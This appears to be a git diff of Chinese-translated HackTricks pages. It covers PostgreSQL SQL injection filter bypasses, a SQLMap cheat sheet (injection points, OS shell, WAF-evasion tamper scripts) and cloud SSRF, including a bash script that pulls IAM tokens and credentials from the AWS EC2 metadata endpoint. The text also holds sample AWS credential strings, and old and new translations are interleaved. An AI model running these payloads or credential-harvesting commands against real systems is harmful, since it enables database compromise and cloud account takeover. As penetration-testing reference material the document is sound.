此函数将整个数据库以 XML 格式转储为 1 行(如果数据库非常大,请小心,因为您可能会导致 DoS 或甚至影响您自己的客户端):
```sql
SELECT database_to_xml(true,true,'');
```
### 十六进制字符串
### 字符串以十六进制表示
如果您可以运行**查询**并将它们**包含在字符串中**(例如使用**`query_to_xml`**函数)。**您可以使用`convert_from`将字符串作为十六进制传递,以此绕过过滤器:**
如果您可以运行 **查询** 并将其 **放在字符串中**(例如使用 **`query_to_xml`** 函数)。 **您可以使用 convert\_from 将字符串作为十六进制传递,从而以这种方式绕过过滤器:**
{% code overflow="wrap" %}
```sql
@ -84,34 +85,35 @@ select encode('select cast(string_agg(table_name, '','') as int) from informatio
```
{% endcode %}
### 禁止使用引号
### 禁止引号
如果无法在负载中使用引号,您可以通过`CHR`来绕过这一限制用于基本子句_字符连接仅适用于基本查询如SELECT、INSERT、DELETE等。它不适用于所有SQL语句_:
如果无法在有效负载中使用引号,可以通过 `CHR` 来绕过这一点适用于基本子句_字符连接仅适用于基本查询如 SELECT、INSERT、DELETE 等。它不适用于所有 SQL 语句_
```
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
```
或者使用`$`。这些查询返回相同的结果:
或者使用 `$`。这两个查询返回相同的结果:
```
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
```
<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
如果您对**黑客职业**感兴趣并想要攻破不可能的 - **我们正在招聘!**_需要流利的波兰语书面和口头表达能力_
如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!**_需要流利的波兰语书写和口语能力_
{% embed url="https://www.stmcyber.com/careers" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,26 +1,27 @@
# SQLMap - 速查表
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试拥有20多种工具和功能从侦察到报告。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块让他们有更多时间深入挖掘、弹出shell并享受乐趣。
**即时可用的漏洞评估与渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
## SQLmap的基本参数
## SQLmap 的基本参数
### 通用
```bash
@ -62,22 +63,22 @@
```
## 注入位置
### 从Burp/ZAP捕获
### 从 Burp/ZAP 捕获
捕获请求并创建一个req.txt文件
捕获请求并创建一个 req.txt 文件
```bash
sqlmap -r req.txt --current-user
```
### GET请求注入
### GET 请求注入
```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```
### POST请求注入
### POST 请求注入
```bash
sqlmap -u "http://example.com" --data "username=*&password=*"
```
### 在头和其他 HTTP 方法中的注入
### 在头和其他HTTP方法中的注入
```bash
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
@ -97,12 +98,10 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
```
### Eval
**Sqlmap** 允许使用 `-e``--eval` 来在发送负载之前使用一些 Python 一行代码来处理每个负载。这使得在发送之前以自定义方式处理负载变得非常简单和快速。在以下示例中,**flask cookie session** 在发送之前由 flask 使用已知密钥进行签名
**Sqlmap** 允许使用 `-e``--eval` 在发送之前处理每个有效负载,使用一些 Python 单行代码。这使得在发送之前以自定义方式处理有效负载变得非常简单和快速。在以下示例中,**flask cookie 会话** **在发送之前由 flask 使用已知的密钥进行签名**
```bash
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
```
### Shell
### Shell
```bash
#Exec command
@ -131,7 +130,7 @@ sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threa
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
```
[**阅读这篇文章**](second-order-injection-sqlmap.md)**了解如何使用sqlmap执行简单和复杂的二阶注入。**
[**阅读此帖子** ](second-order-injection-sqlmap.md)**关于如何使用sqlmap执行简单和复杂的二次注入。**
## 自定义注入
@ -143,83 +142,84 @@ python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
```
### 帮助找布尔注入
### 帮助找布尔注入
```bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```
### 篡改
### Tamper
请记住**您可以在Python中创建自己的篡改器**,而且非常简单。您可以在[二次注入页面](second-order-injection-sqlmap.md)中找到一个篡改器示例。
记住,**你可以用 Python 创建自己的 tamper**,这非常简单。你可以在[这里的第二次注入页面](second-order-injection-sqlmap.md)找到一个 tamper 示例。
```bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
```
| Tamper | 描述 |
| Tamper | Description |
| ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| apostrophemask.py | 用其UTF-8全角对应字符替换撇号字符 |
| apostrophenullencode.py | 用其非法双Unicode对应字符替换撇号字符 |
| appendnullbyte.py | 在有效载末尾附加编码的NULL字节字符 |
| base64encode.py | 对给定有效载中的所有字符进行Base64编码 |
| between.py | 将大于运算符('>')替换为'NOT BETWEEN 0 AND #' |
| bluecoat.py | 在SQL语句后的空格字符后替换为有效的随机空白字符。然后将字符'='替换为LIKE运算符 |
| chardoubleencode.py | 对给定有效载中的所有字符进行双重URL编码不处理已编码的字符 |
| commalesslimit.py | 将类似'LIMIT M, N'的实例替换为'LIMIT N OFFSET M' |
| commalessmid.py | 将类似'MID(A, B, C)'的实例替换为'MID(A FROM B FOR C)' |
| concat2concatws.py | 将类似'CONCAT(A, B)'的实例替换为'CONCAT\_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | 对给定有效载中的所有字符进行URL编码不处理已编码的字符 |
| charunicodeencode.py | 对给定有效载中未编码的字符进行Unicode URL编码(不处理已编码的字符)。"%u0022" |
| charunicodeescape.py | 对给定有效载中未编码的字符进行Unicode URL编码(不处理已编码的字符)。"\u0022" |
| equaltolike.py | 将所有等号运算符('='替换为LIKE运算符 |
| escapequotes.py | 斜杠转义引号'和" |
| greatest.py | 将大于运算符('>')替换为'GREATEST'对应字符 |
| halfversionedmorekeywords.py | 在每个关键字前添加版本化的MySQL注释 |
| ifnull2ifisnull.py | 将类似'IFNULL(A, B)'的实例替换为'IF(ISNULL(A), B, A)' |
| modsecurityversioned.py | 用版本化注释包围完整查询 |
| modsecurityzeroversioned.py | 用零版本化注释包围完整查询 |
| multiplespaces.py | 在SQL关键字周围添加多个空格 |
| nonrecursivereplacement.py | 用适合替换的表示形式替换预定义的SQL关键字例如.replace("SELECT", ""))过滤器 |
| percentage.py | 在每个字符前添加百分号'%' |
| overlongutf8.py | 转换给定有效载中的所有字符(不处理已编码的字符) |
| randomcase.py | 将每个关键字字符替换为随机大小写值 |
| randomcomments.py | 向SQL关键字添加随机注释 |
| securesphere.py | 附加特殊制作的字符串 |
| sp\_password.py | 在有效载末尾附加'sp\_password'以自动混淆DBMS日志 |
| space2comment.py | 将空格字符(' ')替换为注释 |
| space2dash.py | 将空格字符(' ')替换为破折号注释('--')后跟随一个随机字符串和一个换行符('\n') |
| space2hash.py | 将空格字符(' ')替换为井号字符('#')后跟随一个随机字符串和一个换行符('\n') |
| space2morehash.py | 将空格字符(' ')替换为井号字符('#')后跟随一个随机字符串和一个换行符('\n') |
| space2mssqlblank.py | 将空格字符(' ')替换为来自有效备用字符集的随机空白字符 |
| space2mssqlhash.py | 将空格字符(' ')替换为井号字符('#')后跟随一个换行符('\n') |
| space2mysqlblank.py | 将空格字符(' ')替换为来自有效备用字符集的随机空白字符 |
| space2mysqldash.py | 将空格字符(' ')替换为破折号注释('--')后跟随一个换行符('\n') |
| space2plus.py | 将空格字符(' ')替换为加号('+' |
| space2randomblank.py | 将空格字符(' ')替换为来自有效备用字符集的随机空白字符 |
| symboliclogical.py | 将AND和OR逻辑运算符替换为它们的符号对应物&&和) |
| unionalltounion.py | 将UNION ALL SELECT替换为UNION SELECT |
| unmagicquotes.py | 将引号字符(')替换为多字节组合%bf%27并在末尾添加通用注释使其起作用 |
| uppercase.py | 将每个关键字字符替换为大写值'INSERT' |
| varnish.py | 追加HTTP头'X-originating-IP' |
| versionedkeywords.py | 用版本化的MySQL注释括起每个非函数关键字 |
| versionedmorekeywords.py | 用版本化的MySQL注释括起每个关键字 |
| xforwardedfor.py | 追加伪造的HTTP头'X-Forwarded-For' |
| apostrophemask.py | 用其 UTF-8 全宽对应字符替换撇号字符 |
| apostrophenullencode.py | 用其非法双Unicode 对应字符替换撇号字符 |
| appendnullbyte.py | 在有效载末尾附加编码的 NULL 字节字符 |
| base64encode.py | 对给定有效载中的所有字符进行 Base64 编码 |
| between.py | 用 'NOT BETWEEN 0 AND #' 替换大于运算符 ('>') |
| bluecoat.py | 用有效的随机空白字符替换 SQL 语句后的空格字符。然后用 LIKE 运算符替换字符 = |
| chardoubleencode.py | 对给定有效载中的所有字符进行双重 URL 编码(不处理已编码的字符) |
| commalesslimit.py | 用 'LIMIT N OFFSET M' 替换 'LIMIT M, N' 的实例 |
| commalessmid.py | 用 'MID(A FROM B FOR C)' 替换 'MID(A, B, C)' 的实例 |
| concat2concatws.py | 用 'CONCAT\_WS(MID(CHAR(0), 0, 0), A, B)' 替换 'CONCAT(A, B)' 的实例 |
| charencode.py | 对给定有效载中的所有字符进行 URL 编码(不处理已编码的字符) |
| charunicodeencode.py | 对给定有效载中未编码的字符进行 Unicode-url 编码(不处理已编码的字符)。"%u0022" |
| charunicodeescape.py | 对给定有效载中未编码的字符进行 Unicode-url 编码(不处理已编码的字符)。"\u0022" |
| equaltolike.py | 用运算符 'LIKE' 替换所有等于运算符 ('=') 的出现 |
| escapequotes.py | 斜杠转义引号 (' 和 ") |
| greatest.py | 用 'GREATEST' 对应字符替换大于运算符 ('>') |
| halfversionedmorekeywords.py | 在每个关键字前添加版本化的 MySQL 注释 |
| ifnull2ifisnull.py | 用 'IF(ISNULL(A), B, A)' 替换 'IFNULL(A, B)' 的实例 |
| modsecurityversioned.py | 用版本化注释包裹完整查询 |
| modsecurityzeroversioned.py | 用零版本化注释包裹完整查询 |
| multiplespaces.py | 在 SQL 关键字周围添加多个空格 |
| nonrecursivereplacement.py | 用适合替换的表示法替换预定义的 SQL 关键字(例如 .replace("SELECT", "")过滤器 |
| percentage.py | 在每个字符前添加百分号 ('%') |
| overlongutf8.py | 转换给定有效载中的所有字符(不处理已编码的字符) |
| randomcase.py | 用随机大小写值替换每个关键字字符 |
| randomcomments.py | 向 SQL 关键字添加随机注释 |
| securesphere.py | 附加特殊构造的字符串 |
| sp\_password.py | 在有效载末尾附加 'sp\_password' 以自动混淆 DBMS 日志 |
| space2comment.py | 用注释替换空格字符 (' ') |
| space2dash.py | 用破折号注释 ('--') 替换空格字符 (' '),后跟随机字符串和换行符 ('\n') |
| space2hash.py | 用井号字符 ('#') 替换空格字符 (' '),后跟随机字符串和换行符 ('\n') |
| space2morehash.py | 用井号字符 ('#') 替换空格字符 (' '),后跟随机字符串和换行符 ('\n') |
| space2mssqlblank.py | 用有效替代字符集中的随机空白字符替换空格字符 (' ') |
| space2mssqlhash.py | 用井号字符 ('#') 替换空格字符 (' '),后跟换行符 ('\n') |
| space2mysqlblank.py | 用有效替代字符集中的随机空白字符替换空格字符 (' ') |
| space2mysqldash.py | 用破折号注释 ('--') 替换空格字符 (' '),后跟换行符 ('\n') |
| space2plus.py | 用加号 ('+') 替换空格字符 (' ') |
| space2randomblank.py | 用有效替代字符集中的随机空白字符替换空格字符 (' ') |
| symboliclogical.py | 用其符号对应物替换 AND 和 OR 逻辑运算符 (&& |
| unionalltounion.py | 用 UNION SELECT 替换 UNION ALL SELECT |
| unmagicquotes.py | 用多字节组合 %bf%27 替换引号字符 ('),并在末尾添加通用注释(以使其工作) |
| uppercase.py | 用大写值 'INSERT' 替换每个关键字字符 |
| varnish.py | 附加 HTTP 头 'X-originating-IP' |
| versionedkeywords.py | 用版本化的 MySQL 注释包裹每个非函数关键字 |
| versionedmorekeywords.py | 用版本化的 MySQL 注释包裹每个关键字 |
| xforwardedfor.py | 附加假 HTTP 头 'X-Forwarded-For' |
<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用20多种工具和功能从侦察到报告。我们不取代渗透测试人员-我们开发定制工具、检测和利用模块让他们有更多时间深入挖掘、弹出shell并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,提供 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

File diff suppressed because one or more lines are too long

View file

@ -1,45 +1,43 @@
# Cloud SSRF
## 云端SSRF
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
***
### AWS
## AWS
#### 在AWS EC2环境中滥用SSRF
### 在 AWS EC2 环境中滥用 SSRF
**元数据**端点可以从任何EC2机器内部访问并提供有关其的有趣信息。它可以在以下URL中访问`http://169.254.169.254`[有关元数据的信息在此处](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)
**元数据** 端点可以从任何 EC2 机器内部访问,并提供有关它的有趣信息。可以通过以下 URL 访问:`http://169.254.169.254` ([有关元数据的信息在这里](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html))
有**2个版本**的元数据端点。**第一个**版本允许通过**GET**请求访问端点(因此任何**SSRF都可以利用它**)。对于**版本2**[IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html),您需要发送带有**HTTP头**的**PUT**请求来请求一个**令牌**然后使用该令牌来通过另一个HTTP头访问元数据因此使用SSRF**更加复杂**)。
元数据端点有 **2 个版本**。**第一个** 版本允许通过 **GET** 请求 **访问** 端点(因此任何 **SSRF 都可以利用它**)。对于 **版本 2**[IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html),您需要通过发送带有 **HTTP 头****PUT** 请求来请求 **令牌**,然后使用该令牌通过另一个 HTTP 头访问元数据(因此用 SSRF **滥用起来更复杂**)。
{% hint style="danger" %}
请注意如果EC2实例正在强制执行IMDSv2[**根据文档**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html)**PUT请求的响应**将具有**1个跳数限制**这将使得无法从EC2实例内部的容器访问EC2元数据。
请注意,如果 EC2 实例强制执行 IMDSv2[**根据文档**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html)**PUT 请求的响应** 将具有 **跳数限制为 1**,使得无法从 EC2 实例内部的容器访问 EC2 元数据。
此外,**IMDSv2**还将**阻止包含`X-Forwarded-For`头的请求以获取令牌**。这是为了防止配置错误的反向代理能够访问它。
此外,**IMDSv2** 还将 **阻止包含 `X-Forwarded-For` 头的请求以获取令牌**。这是为了防止配置错误的反向代理能够访问它。
{% endhint %}
您可以在文档中找到有关[元数据端点的信息](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html)。在以下脚本中,从中获取了一些有趣的信息:
您可以在文档中找到有关 [元数据端点的信息](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html)。在以下脚本中,从中获取了一些有趣的信息:
```bash
EC2_TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
@ -99,91 +97,81 @@ echo ""
echo "EC2 Security Credentials"
eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
```
作为一个**公开可用的IAM凭证**暴露示例,您可以访问:[http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
作为公开可用的IAM凭证暴露示例您可以访问[http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
您还可以在以下地址检查公共**EC2安全凭证**[http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance)
您还可以在以下位置检查公开的EC2安全凭证[http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance)
然后您可以使用这些凭证与AWS CLI。这将允许您执行该角色具有权限执行的任何操作。
要利用新凭证您需要创建一个类似以下内容的新AWS配置文件
然后,您可以**使用这些凭证与AWS CLI**。这将允许您执行**该角色具有权限**的任何操作。
要利用新的凭证您需要创建一个新的AWS配置文件如下所示
```
[profilename]
aws_access_key_id = ASIA6GG7PSQG4TCGYYOU
aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT5pUkyPJsjC
aws_access_key_id = ASIA6GG71[...]
aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT[...]
aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4FsgtWaIikf5mSSoMIWsUGMb1AiEAlOiY0zQ31XapsIjJwgEXhBIW3u/XOfZJTrvdNe4rbFwq2gMIYBAAGgw5NzU0MjYyNjIwMjkiDCvj4qbZSIiiBUtrIiq3A8IfXmTcebRDxJ9BGjNwLbOYDlbQYXBIegzliUez3P/fQxD3qDr+SNFg9w6WkgmDZtjei6YzOc/a9TWgIzCPQAWkn6BlXufS+zm4aVtcgvBKyu4F432AuT4Wuq7zrRc+42m3Z9InIM0BuJtzLkzzbBPfZAz81eSXumPdid6G/4v+o/VxI3OrayZVT2+fB34cKujEOnBwgEd6xUGUcFWb52+jlIbs8RzVIK/xHVoZvYpY6KlmLOakx/mOyz1tb0Z204NZPJ7rj9mHk+cX/G0BnYGIf8ZA2pyBdQyVbb1EzV0U+IPlI+nkIgYCrwTCXUOYbm66lj90frIYG0x2qI7HtaKKbRM5pcGkiYkUAUvA3LpUW6LVn365h0uIbYbVJqSAtjxUN9o0hbQD/W9Y6ZM0WoLSQhYt4jzZiWi00owZJjKHbBaQV6RFwn5mCD+OybS8Y1dn2lqqJgY2U78sONvhfewiohPNouW9IQ7nPln3G/dkucQARa/eM/AC1zxLu5nt7QY8R2x9FzmKYGLh6sBoNO1HXGzSQlDdQE17clcP+hrP/m49MW3nq/A7WHIczuzpn4zv3KICLPIw2uSc7QU6tAEln14bV0oHtHxqC6LBnfhx8yaD9C71j8XbDrfXOEwdOy2hdK0M/AJ3CVe/mtxf96Z6UpqVLPrsLrb1TYTEWCH7yleN0i9koRQDRnjntvRuLmH2ERWLtJFgRU2MWqDNCf2QHWn+j9tYNKQVVwHs3i8paEPyB45MLdFKJg6Ir+Xzl2ojb6qLGirjw8gPufeCM19VbpeLPliYeKsrkrnXWO0o9aImv8cvIzQ8aS1ihqOtkedkAsw=
```
注意 **aws\_session\_token**,这是使配置文件正常工作的必要条件。
注意**aws\_session\_token**,这对配置文件的工作至关重要
[**PACU**](https://github.com/RhinoSecurityLabs/pacu) 可以与发现的凭据一起使用,以找出您的权限并尝试提升权限
[**PACU**](https://github.com/RhinoSecurityLabs/pacu)可与发现的凭据一起使用,以查找您的权限并尝试提升权限
### AWS ECS容器服务凭据中的 SSRF
#### AWS ECS容器服务凭据中的SSRF
**ECS**是一组逻辑EC2实例您可以在其中运行应用程序而无需扩展自己的集群管理基础设施因为ECS会为您管理。如果您成功地妥协了在**ECS**中运行的服务,则**元数据端点会发生变化**。
如果您访问\_**http://169.254.170.2/v2/credentials/\<GUID>**\_您将找到ECS机器的凭据。但首先您需要**找到\<GUID>**。要找到\<GUID>,您需要读取机器内的**environ**变量**AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI**。\
